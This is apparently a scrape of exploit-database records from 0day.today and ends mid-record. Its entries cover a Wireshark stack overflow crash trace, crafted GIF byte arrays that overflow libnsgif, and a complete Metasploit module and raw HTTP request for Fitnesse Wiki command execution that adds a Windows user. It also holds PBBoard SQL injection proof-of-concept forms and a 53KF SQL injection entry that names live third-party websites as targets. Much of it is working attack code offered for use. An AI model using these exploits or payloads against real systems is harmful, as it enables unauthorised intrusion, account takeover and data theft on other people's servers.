0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #21 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #22 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9\r\n #23 0x7fa9c40708f4 in dissector_try_uint wireshark/epan/packet.c:1216:9\r\n #24 0x7fa9c62dddf0 in decode_udp_ports wireshark/epan/dissectors/packet-udp.c:585:7\r\n #25 0x7fa9c62ecd90 in dissect wireshark/epan/dissectors/packet-udp.c:1080:5\r\n #26 0x7fa9c62e0ae0 in dissect_udp wireshark/epan/dissectors/packet-udp.c:1086:3\r\n #27 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #28 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #29 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9\r\n #30 0x7fa9c52a333b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1977:7\r\n #31 0x7fa9c5312dba in dissect_ipv6 wireshark/epan/dissectors/packet-ipv6.c:2399:14\r\n #32 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #33 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #34 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9\r\n #35 0x7fa9c40708f4 in dissector_try_uint wireshark/epan/packet.c:1216:9\r\n #36 0x7fa9c5938ee2 in dissect_null wireshark/epan/dissectors/packet-null.c:457:12\r\n #37 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #38 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #39 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9\r\n #40 0x7fa9c4e81105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11\r\n #41 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #42 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #43 0x7fa9c407aa1e in call_dissector_only wireshark/epan/packet.c:2764:8\r\n #44 0x7fa9c406b8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8\r\n #45 0x7fa9c406acd4 in dissect_record wireshark/epan/packet.c:539:3\r\n #46 0x7fa9c401ddb9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2\r\n #47 0x52ef3f in process_packet wireshark/tshark.c:3727:5\r\n #48 0x52830c in load_cap_file wireshark/tshark.c:3483:11\r\n #49 0x51e67c in main wireshark/tshark.c:2192:13\r\n \r\nAddress 0x7fff6e9e9a68 is located in stack of thread T0 at offset 168 in frame\r\n #0 0x7fa9c4c2945f in dissect_sgmp wireshark/epan/dissectors/packet-dof.c:8718\r\n \r\n This frame has 8 object(s):\r\n [32, 34) 'app'\r\n [48, 52) 'app_len'\r\n [64, 66) 'version'\r\n [80, 84) 'length'\r\n [96, 128) 'key'\r\n [160, 168) 'response' <== Memory access at offset 168 overflows this variable\r\n [192, 194) 'version129'\r\n [208, 212) 'length130'\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/epan/dissectors/packet-dof.c:2662:32 in dissect_2008_16_security_4\r\nShadow bytes around the buggy address:\r\n 0x10006dd352f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35330: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 02 f2 04 f2\r\n=>0x10006dd35340: 02 f2 04 f2 00 00 00 00 f2 f2 f2 f2 00[f2]f2 f2\r\n 0x10006dd35350: 02 f2 04 f3 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==27389==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12351. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39748.zip\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25986"}, {"lastseen": "2018-04-08T11:42:21", "references": [], "edition": 2, "description": "Libnsgif version 0.1.2 suffers from stack overflow and out-of-bounds read vulnerabilities.", "reporter": "Hans Jerry Illikainen", "published": "2015-12-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Libnsgif 0.1.2 Stack Overflow / Out-Of-Bounds Read Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7505", "CVE-2015-7506"], "modified": "2015-12-17T00:00:00", "id": "1337DAY-ID-24744", "href": "https://0day.today/exploit/description/24744", "sourceData": "Overview\r\n========\r\n\r\nLibnsgif[1] is a decoding library for GIF images. It is primarily\r\ndeveloped and used as part of the NetSurf project.\r\n\r\nAs of version 0.1.2, libnsgif is vulnerable to a stack overflow\r\n(CVE-2015-7505) and an out-of-bounds read (CVE-2015-7506) due to the way\r\nLZW-compressed GIF data is processed.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nsrc/libnsgif.c #80..133:\r\n,----\r\n| /* Maximum LZW bits available\r\n| */\r\n| #define GIF_MAX_LZW 12\r\n| [...]\r\n| static int table[2][(1 << GIF_MAX_LZW)];\r\n| static unsigned char stack[(1 << GIF_MAX_LZW) * 2];\r\n`----\r\n\r\nsrc/libnsgif.c #423..628:\r\n,----\r\n| static gif_result gif_initialise_frame(gif_animation *gif) {\r\n| [...]\r\n| if (gif_data[0] > GIF_MAX_LZW)\r\n| return GIF_DATA_ERROR;\r\n| [...]\r\n| }\r\n`----\r\n\r\n\r\nsrc/libnsgif.c #751..1053:\r\n,----\r\n| gif_result gif_decode_frame(gif_animation *gif, unsigned int frame) {\r\n| [...]\r\n| /* Initialise the LZW decoding\r\n| */\r\n| set_code_size = gif_data[0];\r\n| [...]\r\n| code_size = set_code_size + 1;\r\n| clear_code = (1 << set_code_size);\r\n| end_code = clear_code + 1;\r\n| max_code_size = clear_code << 1;\r\n| max_code = clear_code + 2;\r\n| [...]\r\n| }\r\n`----\r\n\r\n\r\nsrc/libnsgif.c #1145..1169:\r\n,----\r\n| void gif_init_LZW(gif_animation *gif) {\r\n| [...]\r\n| *stack_pointer++ =firstcode;\r\n| }\r\n`----\r\n\r\n\r\nsrc/libnsgif.c #1172..1237:\r\n,----\r\n| static bool gif_next_LZW(gif_animation *gif) {\r\n| [...]\r\n| code = gif_next_code(gif, code_size);\r\n| [...]\r\n| incode = code;\r\n| if (code >= max_code) {\r\n| *stack_pointer++ = firstcode;\r\n| code = oldcode;\r\n| }\r\n| \r\n| /* The following loop is the most important in the GIF decoding cycle as every\r\n| * single pixel passes through it.\r\n| *\r\n| * Note: our stack is always big enough to hold a complete decompressed chunk. */\r\n| while (code >= clear_code) {\r\n| *stack_pointer++ = table[1][code];\r\n| new_code = table[0][code];\r\n| if (new_code < clear_code) {\r\n| code = new_code;\r\n| break;\r\n| }\r\n| *stack_pointer++ = table[1][new_code];\r\n| code = table[0][new_code];\r\n| if (code == new_code) {\r\n| gif->current_error = GIF_FRAME_DATA_ERROR;\r\n| return false;\r\n| }\r\n| }\r\n| \r\n| *stack_pointer++ = firstcode = table[1][code];\r\n| [...]\r\n| oldcode = incode;\r\n| [...]\r\n| }\r\n`----\r\n\r\n\r\nCVE-2015-7505\r\n=============\r\n\r\nSince `gif_next_LZW()' writes onto the stack so long as `code' is at\r\nleast `clear_code', an overflow may eventually occur while processing a\r\nmaliciously crafted image.\r\n\r\nUsing NetSurf as an example:\r\n\r\n,----\r\n| ~/netsurf-all-3.3/netsurf$ gdb -x stack.py --args ./nsgtk stack.gif\r\n| [...]\r\n| stack overflow: ptr: 0x968903, end of stack: 0x968900 (+3)\r\n| stack overflow: ptr: 0x968904, end of stack: 0x968900 (+4)\r\n| stack overflow: ptr: 0x968905, end of stack: 0x968900 (+5)\r\n| stack overflow: ptr: 0xf0000968906, end of stack: 0x968900 (+16492674416646)\r\n| \r\n| Program received signal SIGSEGV, Segmentation fault.\r\n| 0x000000000051a890 in gif_next_LZW (gif=0xbccc00) at src/libnsgif.c:1210\r\n| 1210 *stack_pointer++ = table[1][code];\r\n| (gdb)\r\n`----\r\n\r\n\r\nstack.py:\r\n,----\r\n| class Breakpoint(gdb.Breakpoint):\r\n| def stop(self):\r\n| stack_pointer = get_hex(\"stack_pointer\")\r\n| stack = get_hex(\"&stack\")\r\n| stack_size = get_hex(\"sizeof stack / sizeof *stack\")\r\n| stack_end = stack + stack_size\r\n| \r\n| table_size = get_hex(\"sizeof table / sizeof **table / 2\")\r\n| code = get_hex(\"code\")\r\n| \r\n| if stack_pointer > stack_end:\r\n| print(\"stack overflow: ptr: 0x%x, end of stack: 0x%x (+%d)\" %\r\n| (stack_pointer, stack_end, stack_pointer - stack_end))\r\n| if code >= table_size:\r\n| print(\"out-of-bounds read: code: %d (+%d)\" %\r\n| (code, code - table_size + 1))\r\n| return False\r\n| \r\n| def get_hex(arg):\r\n| res = gdb.execute(\"print/x %s\" % arg, to_string=True)\r\n| x = res.split(\" \")[-1].strip()\r\n| return int(x, 16)\r\n| \r\n| Breakpoint(\"netsurf-all-3.3/libnsgif/src/libnsgif.c:1210\")\r\n| Breakpoint(\"netsurf-all-3.3/libnsgif/src/libnsgif.c:1216\")\r\n| \r\n| gdb.execute(\"run\")\r\n`----\r\n\r\n\r\nstack.gif:\r\n,----\r\n| unsigned char stack[] = {\r\n| /* GIF87a */\r\n| 0x47, 0x49, 0x46, 0x38, 0x37, 0x61,\r\n| \r\n| /* gif_initialise() */\r\n| 0x04, 0x00, /* gif->width */\r\n| 0x04, 0x33, /* gif->height */\r\n| 0x00, /* gif->global_colours */\r\n| 0x00, /* gif->background_index */\r\n| 0x00, /* gif->aspect_ratio */\r\n| \r\n| /* gif_initialise_frame() */\r\n| 0x2c, /* GIF_IMAGE_SEPARATOR */\r\n| 0x00, 0x00, /* offset_x */\r\n| 0x00, 0x00, /* offset_y */\r\n| 0x1b, 0x00, /* width */\r\n| 0x04, 0x00, /* height */\r\n| 0x00, /* flags */\r\n| 0x04, /* code size */\r\n| 0x0d, /* block_size */\r\n| \r\n| /* image data */\r\n| 0x10, 0xcb,\r\n| 0x41, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3,\r\n| \r\n| /* end of image data */\r\n| 0x00,\r\n| \r\n| /* end of .gif */\r\n| 0x3b\r\n| };\r\n`----\r\n\r\n\r\nCVE-2015-7506\r\n=============\r\n\r\nIf `set_code_size' is 0xc, `clear_code' is assigned a value of 4096.\r\nSince the while-loop in `gif_next_LZW()' executes so long as `code >=\r\nclear_code', an out-of-bounds read might occur due to `code' being used\r\nto dereference `table' (2d array * 4096). A boundary check exist in\r\nthat if `code >= max_code', it's assigned the value of `oldcode' --\r\nhowever, the result may still exceed `max_code' due to the bookkeeping\r\nof the *original* value:\r\n\r\nsrc/libnsgif.c #1172..1237:\r\n,----\r\n| static bool gif_next_LZW(gif_animation *gif) {\r\n| [...]\r\n| incode = code;\r\n| if (code >= max_code) {\r\n| *stack_pointer++ = firstcode;\r\n| code = oldcode;\r\n| }\r\n| [...]\r\n| oldcode = incode;\r\n| [...]\r\n| }\r\n`----\r\n\r\nAgain, using NetSurf as an example:\r\n\r\n,----\r\n| ~/netsurf-all-3.3/netsurf$ gdb -x oob.py --args ./nsgtk oob.gif\r\n| [...]\r\n| out-of-bounds read: code: 6670 (+2575)\r\n| out-of-bounds read: code: 7999 (+3904)\r\n`----\r\n\r\n\r\noob.py:\r\n,----\r\n| class Breakpoint(gdb.Breakpoint):\r\n| def stop(self):\r\n| stack_pointer = get_hex(\"stack_pointer\")\r\n| stack = get_hex(\"&stack\")\r\n| stack_size = get_hex(\"sizeof stack / sizeof *stack\")\r\n| stack_end = stack + stack_size\r\n| \r\n| table_size = get_hex(\"sizeof table / sizeof **table / 2\")\r\n| code = get_hex(\"code\")\r\n| \r\n| if stack_pointer > stack_end:\r\n| print(\"stack overflow: ptr: 0x%x, end of stack: 0x%x (+%d)\" %\r\n| (stack_pointer, stack_end, stack_pointer - stack_end))\r\n| if code >= table_size:\r\n| print(\"out-of-bounds read: code: %d (+%d)\" %\r\n| (code, code - table_size + 1))\r\n| return False\r\n| \r\n| def get_hex(arg):\r\n| res = gdb.execute(\"print/x %s\" % arg, to_string=True)\r\n| x = res.split(\" \")[-1].strip()\r\n| return int(x, 16)\r\n| \r\n| Breakpoint(\"netsurf-all-3.3/libnsgif/src/libnsgif.c:1210\")\r\n| Breakpoint(\"netsurf-all-3.3/libnsgif/src/libnsgif.c:1216\")\r\n| \r\n| gdb.execute(\"run\")\r\n`----\r\n\r\n\r\noob.gif:\r\n,----\r\n| unsigned char oob[] = {\r\n| /* GIF87a */\r\n| 0x47, 0x49, 0x46, 0x38, 0x37, 0x61,\r\n| \r\n| /* gif_initialise() */\r\n| 0x04, 0x00, /* gif->width */\r\n| 0x04, 0x33, /* gif->height */\r\n| 0x00, /* gif->global_colours */\r\n| 0x00, /* gif->background_index */\r\n| 0x00, /* gif->aspect_ratio */\r\n| \r\n| /* gif_initialise_frame() */\r\n| 0x2c, /* GIF_IMAGE_SEPARATOR */\r\n| 0x00, 0x00, /* offset_x */\r\n| 0x00, 0x00, /* offset_y */\r\n| 0x1b, 0x00, /* width */\r\n| 0x04, 0x00, /* height */\r\n| 0x00, /* flags */\r\n| 0x0c, /* code size */\r\n| 0x0d, /* block_size */\r\n| \r\n| /* image data */\r\n| 0x10, 0xcb,\r\n| 0x41, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3,\r\n| \r\n| /* end of image data */\r\n| 0x00,\r\n| \r\n| /* end of .gif */\r\n| 0x3b\r\n| };\r\n`----\r\n\r\n\r\nSolution\r\n========\r\n\r\nBoth vulnerabilities are fixed in git HEAD[2].\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24744"}, {"lastseen": "2018-01-02T19:03:04", "references": [], "description": "This Metasploit module exploits a vulnerability found in Fitnesse Wiki, version 20140201 and earlier.", "edition": 2, "reporter": "secpod", "published": "2014-03-29T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Fitnesse Wiki Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1216"], "modified": "2014-03-29T00:00:00", "id": "1337DAY-ID-22084", "href": "https://0day.today/exploit/description/22084", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Fitnesse Wiki Remote Command Execution',\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Fitnesse Wiki, version 20140201\r\n and earlier.\r\n },\r\n 'Author' =>\r\n [\r\n 'Jerzy Kramarz', ## Vulnerability discovery\r\n 'Veerendra G.G <veerendragg {at} secpod.com>', ## Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-1216' ],\r\n [ 'OSVDB', '103907' ],\r\n [ 'BID', '65921' ],\r\n [ 'URL', 'http://secpod.org/blog/?p=2311' ],\r\n [ 'URL', 'http://secpod.org/msf/fitnesse_wiki_rce.rb' ],\r\n [ 'URL', 'http://seclists.org/fulldisclosure/2014/Mar/1' ],\r\n [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1216/' ]\r\n ],\r\n \r\n 'Privileged' => false,\r\n 'Payload' =>\r\n {\r\n 'Space' => 1000,\r\n 'BadChars' => \"\",\r\n 'DisableNops' => true,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd', ##\r\n ##'RequiredCmd' => 'generic telnet',\r\n ## payloads cmd/windows/adduser and cmd/windows/generic works perfectly\r\n }\r\n },\r\n 'Platform' => %w{ win },\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' =>\r\n [\r\n ['Windows', { 'Platform' => 'win' } ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Feb 25 2014'))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(80),\r\n OptString.new('TARGETURI', [true, 'Fitnesse Wiki base path', '/'])\r\n ], self.class)\r\n end\r\n \r\n def check\r\n print_status(\"#{peer} - Trying to detect Fitnesse Wiki\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path)\r\n })\r\n \r\n if res && res.code == 200 && res.body.include?(\">FitNesse<\")\r\n print_good(\"#{peer} - FitNesse Wiki Detected!\")\r\n return Exploit::CheckCode::Detected\r\n end\r\n \r\n return Exploit::CheckCode::Safe\r\n end\r\n \r\n def http_send_command(command)\r\n \r\n ## Construct random page in WikiWord format\r\n uri = normalize_uri(target_uri.path, 'TestP' + rand_text_alpha_lower(7))\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri + \"?edit\"\r\n })\r\n \r\n if !res || res.code != 200\r\n fail_with(Failure::Unknown, \"#{peer} - Unexpected response, exploit probably failed!\")\r\n end\r\n \r\n print_status(\"#{peer} - Retrieving edit time and ticket id\")\r\n \r\n ## Get Edit Time and Ticket Id from the response\r\n res.body =~ /\"editTime\" value=\"((\\d)+)\"/\r\n edit_time = $1\r\n \r\n res.body =~ /\"ticketId\" value=\"((-?\\d)+)\"/\r\n ticket_id = $1\r\n \r\n ## Validate we are able to extract Edit Time and Ticket Id\r\n if !edit_time or !ticket_id\r\n print_error(\"#{peer} - Failed to get Ticket Id / Edit Time.\")\r\n return\r\n end\r\n \r\n print_status(\"#{peer} - Attempting to create '#{uri}'\")\r\n \r\n ## Construct Referer\r\n referer = \"http://#{rhost}:#{rport}\" + uri + \"?edit\"\r\n \r\n ## Construct command to be executed\r\n page_content = '!define COMMAND_PATTERN {%m}\r\n!define TEST_RUNNER {' + command + '}'\r\n \r\n print_status(\"#{peer} - Injecting the payload\")\r\n ## Construct POST request to create page with malicious commands\r\n ## inserted in the page\r\n res = send_request_cgi(\r\n {\r\n 'uri' => uri,\r\n 'method' => 'POST',\r\n 'headers' => {'Referer' => referer},\r\n 'vars_post' =>\r\n {\r\n 'editTime' => edit_time,\r\n 'ticketId' => ticket_id,\r\n 'responder' => 'saveData',\r\n 'helpText' => '',\r\n 'suites' => '',\r\n '__EDITOR__1' => 'textarea',\r\n 'pageContent' => page_content,\r\n 'save' => 'Save',\r\n }\r\n })\r\n \r\n if res && res.code == 303\r\n print_status(\"#{peer} - Successfully created '#{uri}' with payload\")\r\n end\r\n \r\n ## Execute inserted command\r\n print_status(\"#{peer} - Sending exploit request\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri + \"?test\"\r\n })\r\n \r\n if res && res.code == 200\r\n print_status(\"#{peer} - Successfully sent exploit request\")\r\n end\r\n \r\n ## Cleanup by deleting the created page\r\n print_status(\"#{peer} - Execting cleanup routine\")\r\n referer = \"http://#{rhost}:#{rport}\" + uri + \"?deletePage\"\r\n res = send_request_cgi(\r\n {\r\n 'uri' => uri + \"?deletePage\",\r\n 'method' => 'POST',\r\n 'headers' => {'Referer' => referer},\r\n 'vars_post' =>\r\n {\r\n 'confirmed' => 'Yes',\r\n }\r\n })\r\n end\r\n \r\n def exploit\r\n http_send_command(payload.encoded)\r\n end\r\nend\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22084"}, {"lastseen": "2018-01-08T23:04:55", "references": [], "description": "Fitnesse Wiki 20131110 suffers from a remote command execution vulnerability.", "edition": 2, "reporter": "Jerzy Kramarz", "published": "2014-03-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "type": "zdt", "title": "Fitnesse Wiki 20131110 Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1216"], "modified": "2014-03-02T00:00:00", "id": "1337DAY-ID-21972", "href": "https://0day.today/exploit/description/21972", "sourceData": "Vulnerability title: Remote Command Execution in Fitnesse Wiki\r\nCVE: CVE-2014-1216\r\nVendor: Fitnesse\r\nProduct: Wiki\r\nAffected version: v20131110 and earlier\r\nFixed version: N/A\r\nReported by: Jerzy Kramarz\r\n\r\nDetails:\r\n\r\nThe Fitnesse wiki does not validate the syntax of edited pages to\r\nvalidate whether the pages are introducing any extra parameters that\r\ncould be executed in the context of the application. This vulnerability\r\ncould be exploited by remote attackers to introduce external commands\r\ninto the workflow of the application that would execute them.\r\n\r\nExploit\r\n\r\nAfter creating a new page in the wiki (or editing already existing page) sending a request similar to below would trigger the vulnerability:\r\n\r\nPOST /<any page> HTTP/1.1\r\nHost: <host>:<port>\r\nProxy-Connection: keep-alive\r\nContent-Length: 374\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nOrigin: http://<host>:<port>\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36\r\nContent-Type: application/x-www-form-urlencoded\r\nDNT: 1\r\nReferer: http://<host>:<port>/<page>?edit\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: textwrapon=false; wysiwyg=textarea\r\n\r\neditTime=1384209902568&ticketId=-7153973663219190464&responder=saveData&helpText=&suites=&__EDITOR__1=textarea&pageContent=%21define+COMMAND_PATTERN+%7B%25m+%7C%7C+%7D%0D%0A%21define+TEST_RUNNER+%7Bcmd.exe+%2Fc+%22net+user+XXXXXXXX+XXXXXXXX+%2Fadd%22%7D%0D%0A%21path+dotnet4%5Cdbfit.dll%0D%0A%21path+dotnet4%5Cdbfit.sqlserver.dll%0D%0A%21path+dotnet2%5C*.dll&save=Save\r\n\r\nAfter editing the page with content specified above, the vulnerability could be triggered by visiting \u2018http://<host>:<port>/<created/edited page name>?test\u2019\r\n\r\n\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1216/\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21972"}, {"lastseen": "2018-04-13T07:48:22", "references": [], "edition": 2, "description": "Exploit for asp platform in category web applications", "reporter": "The Black Devils", "published": "2012-12-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "53KF sql injection Vulnerability", "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-12-04T00:00:00", "id": "1337DAY-ID-19883", "href": "https://0day.today/exploit/description/19883", "sourceData": "# Exploit Title: 53KF sql injection Vulnerability\r\n# Date: 05/10/2012\r\n# Author: The Black Devils\r\n# Home: 1337day Exploit DataBase 1337day.com\r\n# Software Link: http://www.53kf.com/\r\n# Category : [ webapps ]\r\n# Dork : use google\r\n# Type : asp\r\n# Tested on: [Windows] & [Ubuntu]\r\n\r\n-------------------------------\r\n\r\nhttp:\\Localhost\\[Path]\\shop.asp?id= sql injection\r\n\r\n-------------------------------\r\n\r\n# Demo site:\r\nhttp://www.fenhong123.com/eshop/shop.asp?id=1796'\r\nhttp://www.51sxh.com/shop.asp?id=1216'\r\nhttp://www.firstaidkitsaustralia.com.au/shop.asp?id=1'\r\n\r\n\r\n\r\n#------------------\r\nContact:\r\nhttps://www.facebook.com/DevilsDz\r\nhttps://www.facebook.com/necesarios\r\n#------------------\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19883"}, {"lastseen": "2018-03-20T05:20:34", "references": [], "edition": 2, "description": "Exploit for php platform in category web applications", "reporter": "High-Tech Bridge", "published": "2012-08-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "PBBoard 2.1.4 SQL Injection / Improper Authentication / Broken Access Control", "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-08-11T00:00:00", "id": "1337DAY-ID-19165", "href": "https://0day.today/exploit/description/19165", "sourceData": "Vendor: www.pbboard.com\r\nVulnerable Version(s): 2.1.4 and probably prior\r\nTested Version: 2.1.4\r\nVendor Notification: July 18, 2012 \r\nPublic Disclosure: August 8, 2012 \r\nVulnerability Type: SQL Injection [CWE-89], Improper Authentication [CWE-287], Improper Access Control [CWE-284]\r\nCVE References: CVE-2012-4034, CVE-2012-4035, CVE-2012-4036\r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in PBBoard, which can be exploited to perform SQL injection attacks, change password of arbitrary user and create arbitrary files in folder of the vulnerable application.\r\n\r\n\r\n1) Multiple SQL Injections in PBBoard: CVE-2012-4034\r\n\r\n1.1 Input passed via the \"username\" POST parameter to /index.php (when \"id\", \"member\" and \"start\" parameters are set, and \"page\" is set to \"send\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?id=1&member=1&page=send&start=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"username\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n 1.2 Input passed via the \"email\" POST parameter to /index.php (when \"send_active_code\" parameter is set, and \"page\" is set to \"forget\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=forget&send_active_code=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"email\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n1.3 Input passed via the \"password\" POST parameter to /index.php (when \"password_check\" and \"id\" parameters are set, and \"page\" is set to \"forum_archive\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=forum_archive&password_check=1&id=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"password\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n1.4 Input passed via the \"section\" POST parameter to /index.php (when \"move\" and \"subject_id\" parameters are set, and \"page\" is set to \"management\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=management&move=1&subject_id=1\" 